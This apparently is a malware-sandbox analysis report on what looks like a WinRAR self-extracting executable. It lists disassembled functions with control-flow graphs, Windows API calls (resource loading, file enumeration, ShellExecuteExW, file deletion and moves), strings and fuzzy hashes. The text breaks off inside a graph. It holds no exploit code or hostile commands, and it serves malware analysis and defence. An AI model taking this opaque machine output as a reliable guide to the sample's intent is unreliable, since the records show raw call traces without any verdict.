                                                                                                                                          • Opcode Fuzzy Hash: acc7554025e8e22b328270ca2209a0d0b96d69b9bd41175f1ed757ef76900819
                                                                                                                                          • Instruction Fuzzy Hash: 19611571904388BFD320AB75ED49FBB7BEDAB49700F040029FA45929E2DB749984D761
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 812 fa6c2-fa6df FindResourceW 813 fa7db 812->813 814 fa6e5-fa6f6 SizeofResource 812->814 815 fa7dd-fa7e1 813->815 814->813 816 fa6fc-fa70b LoadResource 814->816 816->813 817 fa711-fa71c LockResource 816->817 817->813 818 fa722-fa737 GlobalAlloc 817->818 819 fa73d-fa746 GlobalLock 818->819 820 fa7d3-fa7d9 818->820 821 fa7cc-fa7cd GlobalFree 819->821 822 fa74c-fa76a call 100320 819->822 820->815 821->820 826 fa76c-fa78e call fa626 822->826 827 fa7c5-fa7c6 GlobalUnlock 822->827 826->827 832 fa790-fa798 826->832 827->821 833 fa79a-fa7ae GdipCreateHBITMAPFromBitmap 832->833 834 fa7b3-fa7c1 832->834 833->834 835 fa7b0 833->835 834->827 835->834
                                                                                                                                          APIs
                                                                                                                                          • FindResourceW.KERNELBASE(?,PNG,00000000,?,?,?,000FB73D,00000066), ref: 000FA6D5
                                                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA6EC
                                                                                                                                          • LoadResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA703
                                                                                                                                          • LockResource.KERNEL32(00000000,?,?,?,000FB73D,00000066), ref: 000FA712
                                                                                                                                          • GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA72D
                                                                                                                                          • GlobalLock.KERNEL32(00000000,?,?,?,?,?,000FB73D,00000066), ref: 000FA73E
                                                                                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 000FA7C6
                                                                                                                                            • Part of subcall function 000FA626: GdipAlloc.GDIPLUS(00000010), ref: 000FA62C
                                                                                                                                          • GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 000FA7A7
                                                                                                                                          • GlobalFree.KERNEL32(00000000), ref: 000FA7CD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: GlobalResource$AllocGdipLock$BitmapCreateFindFreeFromLoadSizeofUnlock
                                                                                                                                          • String ID: PNG
                                                                                                                                          • API String ID: 541704414-364855578
                                                                                                                                          • Opcode ID: 859566de71ed82810eb0e97f8b246f3e48203c215257d66886ccc7adae7946e3
                                                                                                                                          • Instruction ID: dc33a7ead5f1e85937fb3b169ca760c07945091ddff10841121b8e8140a5ffc7
                                                                                                                                          • Opcode Fuzzy Hash: 859566de71ed82810eb0e97f8b246f3e48203c215257d66886ccc7adae7946e3
                                                                                                                                          • Instruction Fuzzy Hash: 3731D3B5604306BFC715AF21ED48D6B7FF9EF85760B004528FA1982A20EB31DC80EA61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 1037 ea69b-ea6bf call fec50 1040 ea727-ea730 FindNextFileW 1037->1040 1041 ea6c1-ea6ce FindFirstFileW 1037->1041 1042 ea742-ea7ff call f0602 call ec310 call f15da * 3 1040->1042 1043 ea732-ea740 GetLastError 1040->1043 1041->1042 1044 ea6d0-ea6e2 call ebb03 1041->1044 1048 ea804-ea811 1042->1048 1045 ea719-ea722 1043->1045 1052 ea6fe-ea707 GetLastError 1044->1052 1053 ea6e4-ea6fc FindFirstFileW 1044->1053 1045->1048 1055 ea709-ea70c 1052->1055 1056 ea717 1052->1056 1053->1042 1053->1052 1055->1056 1058 ea70e-ea711 1055->1058 1056->1045 1058->1056 1060 ea713-ea715 1058->1060 1060->1045
                                                                                                                                          APIs
                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6C4
                                                                                                                                            • Part of subcall function 000EBB03: _wcslen.LIBCMT ref: 000EBB27
                                                                                                                                          • FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6F2
                                                                                                                                          • GetLastError.KERNEL32(?,?,00000800,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA6FE
                                                                                                                                          • FindNextFileW.KERNEL32(?,?,?,?,?,?,000EA592,000000FF,?,?), ref: 000EA728
                                                                                                                                          • GetLastError.KERNEL32(?,?,?,?,000EA592,000000FF,?,?), ref: 000EA734
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: FileFind$ErrorFirstLast$Next_wcslen
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 42610566-0
                                                                                                                                          • Opcode ID: b1608eb33b23fa0f4ef558dcc79b8179124af9f704661942de2c0701e7e341c1
                                                                                                                                          • Instruction ID: 9f26c7d618013e07b872d7c417945a2c17d79e2e119e11aa1d2be13a2b047bfb
                                                                                                                                          • Opcode Fuzzy Hash: b1608eb33b23fa0f4ef558dcc79b8179124af9f704661942de2c0701e7e341c1
                                                                                                                                          • Instruction Fuzzy Hash: 53419C72A00559AFCB25DF64CC88AEAB7B8FB4D350F104196F569E3200D7346E90DF90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • GetCurrentProcess.KERNEL32(?,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002,00000000), ref: 00107E0F
                                                                                                                                          • TerminateProcess.KERNEL32(00000000,?,00107DC4,?,0011C300,0000000C,00107F1B,?,00000002,00000000), ref: 00107E16
                                                                                                                                          • ExitProcess.KERNEL32 ref: 00107E28
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 1703294689-0
                                                                                                                                          • Opcode ID: f1e9c090dbb412fecb14ad532a76ebaac325bd7bbd3a4561e80cef2e1d445ea5
                                                                                                                                          • Instruction ID: f57b3391f58e99bad4f2bea2646ceeb2944c4b394d6afba73dc1a079ffd3bad3
                                                                                                                                          • Opcode Fuzzy Hash: f1e9c090dbb412fecb14ad532a76ebaac325bd7bbd3a4561e80cef2e1d445ea5
                                                                                                                                          • Instruction Fuzzy Hash: 8FE04F31445144EBCF056F10DE099897F69EB14341B008454F8598A5B6CB76EE91CB90
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: H_prolog
                                                                                                                                          • String ID:
                                                                                                                                          • API String ID: 3519838083-0
                                                                                                                                          • Opcode ID: 6494f6645cf3f8e233fa3f4949cd58f58c99334cfc2ba74eabccef33c6e72081
                                                                                                                                          • Instruction ID: e62136dbd2013003371bea2128c94235f096334898e4534194e59ae941a02690
                                                                                                                                          • Opcode Fuzzy Hash: 6494f6645cf3f8e233fa3f4949cd58f58c99334cfc2ba74eabccef33c6e72081
                                                                                                                                          • Instruction Fuzzy Hash: E48209719042C5AEDF65CB65C895BFAB7B9AF05300F0881B9E85DBB283DF315A84C760
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          APIs
                                                                                                                                          • __EH_prolog.LIBCMT ref: 000FB7E5
                                                                                                                                            • Part of subcall function 000E1316: GetDlgItem.USER32(00000000,00003021), ref: 000E135A
                                                                                                                                            • Part of subcall function 000E1316: SetWindowTextW.USER32(00000000,001135F4), ref: 000E1370
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FB8D1
                                                                                                                                          • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 000FB8EF
                                                                                                                                          • IsDialogMessageW.USER32(?,?), ref: 000FB902
                                                                                                                                          • TranslateMessage.USER32(?), ref: 000FB910
                                                                                                                                          • DispatchMessageW.USER32(?), ref: 000FB91A
                                                                                                                                          • GetDlgItemTextW.USER32(?,00000066,?,00000800), ref: 000FB93D
                                                                                                                                          • KiUserCallbackDispatcher.NTDLL(?,00000001), ref: 000FB960
                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 000FB983
                                                                                                                                          • SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000FB99E
                                                                                                                                          • SendMessageW.USER32(00000000,000000C2,00000000,001135F4), ref: 000FB9B1
                                                                                                                                            • Part of subcall function 000FD453: _wcslen.LIBCMT ref: 000FD47D
                                                                                                                                          • SetFocus.USER32(00000000), ref: 000FB9B8
                                                                                                                                          • _swprintf.LIBCMT ref: 000FBA24
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                            • Part of subcall function 000FD4D4: GetDlgItem.USER32(00000068,0013FCB8), ref: 000FD4E8
                                                                                                                                            • Part of subcall function 000FD4D4: ShowWindow.USER32(00000000,00000005,?,?,?,000FAF07,00000001,?,?,000FB7B9,0011506C,0013FCB8,0013FCB8,00001000,00000000,00000000), ref: 000FD510
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 000FD51B
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001135F4), ref: 000FD529
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD53F
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 000FD559
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD59D
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 000FD5AB
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 000FD5BA
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 000FD5E1
                                                                                                                                            • Part of subcall function 000FD4D4: SendMessageW.USER32(00000000,000000C2,00000000,001143F4), ref: 000FD5F0
                                                                                                                                          • GetLastError.KERNEL32(?,00000000,00000000,00000000,?), ref: 000FBA68
                                                                                                                                          • GetLastError.KERNEL32(?,?,00000000,00000000,00000000,?), ref: 000FBA90
                                                                                                                                          • GetTickCount.KERNEL32 ref: 000FBAAE
                                                                                                                                          • _swprintf.LIBCMT ref: 000FBAC2
                                                                                                                                          • GetLastError.KERNEL32(?,00000011), ref: 000FBAF4
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,00000000,00000000,00000000,?), ref: 000FBB43
                                                                                                                                          • _swprintf.LIBCMT ref: 000FBB7C
                                                                                                                                          • CreateFileMappingW.KERNEL32(000000FF,00000000,08000004,00000000,00007104,winrarsfxmappingfile.tmp), ref: 000FBBD0
                                                                                                                                          • GetCommandLineW.KERNEL32 ref: 000FBBEA
                                                                                                                                          • MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00000000,?), ref: 000FBC47
                                                                                                                                          • ShellExecuteExW.SHELL32(0000003C), ref: 000FBC6F
                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 000FBCB9
                                                                                                                                          • UnmapViewOfFile.KERNEL32(?,?,0000430C,?,00000080), ref: 000FBCE2
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000FBCEB
                                                                                                                                          • _swprintf.LIBCMT ref: 000FBD1E
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FBD7D
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000065,001135F4), ref: 000FBD94
                                                                                                                                          • GetDlgItem.USER32(?,00000065), ref: 000FBD9D
                                                                                                                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 000FBDAC
                                                                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 000FBDBB
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FBE68
                                                                                                                                          • _wcslen.LIBCMT ref: 000FBEBE
                                                                                                                                          • _swprintf.LIBCMT ref: 000FBEE8
                                                                                                                                          • SendMessageW.USER32(?,00000080,00000001,?), ref: 000FBF32
                                                                                                                                          • SendDlgItemMessageW.USER32(?,0000006C,00000172,00000000,?), ref: 000FBF4C
                                                                                                                                          • GetDlgItem.USER32(?,00000068), ref: 000FBF55
                                                                                                                                          • SendMessageW.USER32(00000000,00000435,00000000,00400000), ref: 000FBF6B
                                                                                                                                          • GetDlgItem.USER32(?,00000066), ref: 000FBF85
                                                                                                                                          • SetWindowTextW.USER32(00000000,0012A472), ref: 000FBFA7
                                                                                                                                          • SetDlgItemTextW.USER32(?,0000006B,00000000), ref: 000FC007
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FC01A
                                                                                                                                          • DialogBoxParamW.USER32(LICENSEDLG,00000000,Function_0001B5C0,00000000,?), ref: 000FC0BD
                                                                                                                                          • EnableWindow.USER32(00000000,00000000), ref: 000FC197
                                                                                                                                          • SendMessageW.USER32(?,00000111,00000001,00000000), ref: 000FC1D9
                                                                                                                                            • Part of subcall function 000FC73F: __EH_prolog.LIBCMT ref: 000FC744
                                                                                                                                          • SetDlgItemTextW.USER32(?,00000001,00000000), ref: 000FC1FD
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: Message$ItemSend$Text$Window$_swprintf$File$ErrorLast$DialogH_prologLongView_wcslen$CallbackCloseCommandCountCreateDispatchDispatcherEnableExecuteFocusHandleLineMappingModuleNameParamShellShowSleepTickTranslateUnmapUser__vswprintf_c_l
                                                                                                                                          • String ID: %s$"%s"%s$-el -s2 "-d%s" "-sp%s"$<$@$C:\Users\user\Desktop$LICENSEDLG$STARTDLG$__tmp_rar_sfx_access_check_%u$winrarsfxmappingfile.tmp
                                                                                                                                          • API String ID: 3445078344-2238251102
                                                                                                                                          • Opcode ID: 61cd944bb1a571a44e92cf1d67083b4f19bbfb8fa4499cd4ed6181beabd6a5d8
                                                                                                                                          • Instruction ID: 69ddf594fa5a30f0622889d8452f6049d7cfba647e9d37030f1c891cf83fcfb0
                                                                                                                                          • Opcode Fuzzy Hash: 61cd944bb1a571a44e92cf1d67083b4f19bbfb8fa4499cd4ed6181beabd6a5d8
                                                                                                                                          • Instruction Fuzzy Hash: 9142D87094428CBEEB21AB60DD4AFFE77ACAB12700F044155F744B68E3CB745A85DB61
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 268 f0863-f0886 call fec50 GetModuleHandleW 271 f0888-f089f GetProcAddress 268->271 272 f08e7-f0b48 268->272 275 f08b9-f08c9 GetProcAddress 271->275 276 f08a1-f08b7 271->276 273 f0b4e-f0b59 call 1075fb 272->273 274 f0c14-f0c40 GetModuleFileNameW call ec29a call f0602 272->274 273->274 285 f0b5f-f0b8d GetModuleFileNameW CreateFileW 273->285 291 f0c42-f0c4e call eb146 274->291 279 f08cb-f08e0 275->279 280 f08e5 275->280 276->275 279->280 280->272 288 f0b8f-f0b9b SetFilePointer 285->288 289 f0c08-f0c0f CloseHandle 285->289 288->289 292 f0b9d-f0bb9 ReadFile 288->292 289->274 297 f0c7d-f0ca4 call ec310 GetFileAttributesW 291->297 298 f0c50-f0c5b call f081b 291->298 292->289 294 f0bbb-f0be0 292->294 296 f0bfd-f0c06 call f0371 294->296 296->289 304 f0be2-f0bfc call f081b 296->304 306 f0cae 297->306 307 f0ca6-f0caa 297->307 298->297 309 f0c5d-f0c7b CompareStringW 298->309 304->296 311 f0cb0-f0cb5 306->311 307->291 310 f0cac 307->310 309->297 309->307 310->311 313 f0cec-f0cee 311->313 314 f0cb7 311->314 316 f0dfb-f0e05 313->316 317 f0cf4-f0d0b call ec2e4 call eb146 313->317 315 f0cb9-f0ce0 call ec310 GetFileAttributesW 314->315 323 f0cea 315->323 324 f0ce2-f0ce6 315->324 327 f0d0d-f0d6e call f081b * 2 call ee617 call e4092 call ee617 call fa7e4 317->327 328 f0d73-f0da6 call e4092 AllocConsole 317->328 323->313 324->315 326 f0ce8 324->326 326->313 334 f0df3-f0df5 ExitProcess 327->334 333 f0da8-f0ded GetCurrentProcessId AttachConsole call 103e13 GetStdHandle WriteConsoleW Sleep FreeConsole 328->333 328->334 333->334
                                                                                                                                          APIs
                                                                                                                                          • GetModuleHandleW.KERNEL32(kernel32), ref: 000F087C
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 000F088E
                                                                                                                                          • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 000F08BF
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000F0B69
                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 000F0B83
                                                                                                                                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 000F0B93
                                                                                                                                          • ReadFile.KERNEL32(00000000,?,00007FFE,00113C7C,00000000), ref: 000F0BB1
                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 000F0C09
                                                                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 000F0C1E
                                                                                                                                          • CompareStringW.KERNEL32(00000400,00001001,?,?,DXGIDebug.dll,?,00113C7C,?,00000000,?,00000800), ref: 000F0C72
                                                                                                                                          • GetFileAttributesW.KERNELBASE(?,?,00113C7C,00000800,?,00000000,?,00000800), ref: 000F0C9C
                                                                                                                                          • GetFileAttributesW.KERNEL32(?,?,00113D44,00000800), ref: 000F0CD8
                                                                                                                                            • Part of subcall function 000F081B: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 000F0836
                                                                                                                                            • Part of subcall function 000F081B: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,000EF2D8,Crypt32.dll,00000000,000EF35C,?,?,000EF33E,?,?,?), ref: 000F0858
                                                                                                                                          • _swprintf.LIBCMT ref: 000F0D4A
                                                                                                                                          • _swprintf.LIBCMT ref: 000F0D96
                                                                                                                                            • Part of subcall function 000E4092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 000E40A5
                                                                                                                                          • AllocConsole.KERNEL32 ref: 000F0D9E
                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 000F0DA8
                                                                                                                                          • AttachConsole.KERNEL32(00000000), ref: 000F0DAF
                                                                                                                                          • _wcslen.LIBCMT ref: 000F0DC4
                                                                                                                                          • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 000F0DD5
                                                                                                                                          • WriteConsoleW.KERNEL32(00000000), ref: 000F0DDC
                                                                                                                                          • Sleep.KERNEL32(00002710), ref: 000F0DE7
                                                                                                                                          • FreeConsole.KERNEL32 ref: 000F0DED
                                                                                                                                          • ExitProcess.KERNEL32 ref: 000F0DF5
                                                                                                                                          Strings
                                                                                                                                          Memory Dump Source
                                                                                                                                          • Source File: 00000004.00000002.1681251773.00000000000E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                          • Associated: 00000004.00000002.1681227357.00000000000E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681288949.0000000000113000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.000000000011E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000125000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681317151.0000000000142000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          • Associated: 00000004.00000002.1681410121.0000000000143000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                          • Snapshot File: hcaresult_4_2_e0000_s.jbxd
                                                                                                                                          Similarity
                                                                                                                                          • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l_wcslen
                                                                                                                                          • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                          • API String ID: 1207345701-3298887752
                                                                                                                                          • Opcode ID: 95af858fd0c4236cad9a50fe18df717ce5d971d7933189c1ad52f7c219f6549c
                                                                                                                                          • Instruction ID: 49969e6b63877d64b09ddb1a591e0e66f091e4bb50df0e73b521cb338e0c2b66
                                                                                                                                          • Opcode Fuzzy Hash: 95af858fd0c4236cad9a50fe18df717ce5d971d7933189c1ad52f7c219f6549c
                                                                                                                                          • Instruction Fuzzy Hash: 94D1A5B1008384AFD738DF50DA49BDFBBE8BB84704F40492DF299B6145C7B08689CB92
                                                                                                                                          Uniqueness

                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                          Control-flow Graph

                                                                                                                                          • Executed
                                                                                                                                          • Not Executed
                                                                                                                                          control_flow_graph 347 fc73f-fc757 call feb78 call fec50 352 fd40d-fd418 347->352 353 fc75d-fc787 call fb314 347->353 353->352 356 fc78d-fc792 353->356 357 fc793-fc7a1 356->357 358 fc7a2-fc7b7 call faf98 357->358 361 fc7b9 358->361 362 fc7bb-fc7d0 call f1fbb 361->362 365 fc7dd-fc7e0 362->365 366 fc7d2-fc7d6 362->366 368 fd3d9-fd404 call fb314 365->368 369 fc7e6 365->369 366->362 367 fc7d8 366->367 367->368 368->357 380 fd40a-fd40c 368->380 371 fca5f-fca61 369->371 372 fc9be-fc9c0 369->372 373 fc7ed-fc7f0 369->373 374 fca7c-fca7e 369->374 371->368 376 fca67-fca77 SetWindowTextW 371->376 372->368 378 fc9c6-fc9d2 372->378 373->368 379 fc7f6-fc850 call fa64d call ebdf3 call ea544 call ea67e call e6edb 373->379 374->368 377 fca84-fca8b 374->377 376->368 377->368 381 fca91-fcaaa 377->381 382 fc9e6-fc9eb 378->382 383 fc9d4-fc9e5 call 107686 378->383 435 fc98f-fc9a4 call ea5d1 379->435 380->352 385 fcaac 381->385 386 fcab2-fcac0 call 103e13 381->386 389 fc9ed-fc9f3 382->389 390 fc9f5-fca00 call fb48e 382->390 383->382 385->386 386->368 403 fcac6-fcacf 386->403 394 fca05-fca07 389->394 390->394 397 fca09-fca10 call 103e13 394->397 398 fca12-fca32 call 103e13 call 103e3e 394->398 397->398 423 fca4b-fca4d 398->423 424 fca34-fca3b 398->424 407 fcaf8-fcafb 403->407 408 fcad1-fcad5 403->408 411 fcb01-fcb04 407->411 412 fcbe0-fcbee call f0602 407->412 408->411 414 fcad7-fcadf 408->414 416 fcb06-fcb0b 411->416 417 fcb11-fcb2c 411->417 427 fcbf0-fcc04 call 10279b 412->427 414->368 420 fcae5-fcaf3 call f0602 414->420 416->412 416->417 436 fcb2e-fcb68 417->436 437 fcb76-fcb7d 417->437 420->427 423->368 426 fca53-fca5a call 103e2e 423->426 431 fca3d-fca3f 424->431 432 fca42-fca4a call 107686 424->432 426->368 446 fcc06-fcc0a 427->446 447 fcc11-fcc62 call f0602 call fb1be GetDlgItem SetWindowTextW SendMessageW call 103e49 427->447 431->432 432->423 453 fc9aa-fc9b9 call ea55a 435->453 454 fc855-fc869 SetFileAttributesW 435->454 470 fcb6c-fcb6e 436->470 471 fcb6a 436->471 439 fcb7f-fcb97 call 103e13 437->439 440 fcbab-fcbce call 103e13 * 2 437->440 439->440 457 fcb99-fcba6 call f05da 439->457 440->427 475 fcbd0-fcbde call f05da 440->475 446->447 452 fcc0c-fcc0e 446->452 481 fcc67-fcc6b 447->481 452->447 453->368 459 fc90f-fc91f GetFileAttributesW 454->459 460 fc86f-fc8a2 call eb991 call eb690 call 103e13 454->460 457->440 459->435 468 fc921-fc930 DeleteFileW 459->468 491 fc8b5-fc8c3 call ebdb4 460->491 492 fc8a4-fc8b3 call 103e13 460->492 468->435 474 fc932-fc935 468->474 470->437 471->470 478 fc939-fc965 call e4092 GetFileAttributesW 474->478 475->427 488 fc937-fc938 478->488 489 fc967-fc97d MoveFileW 478->489 481->368 485 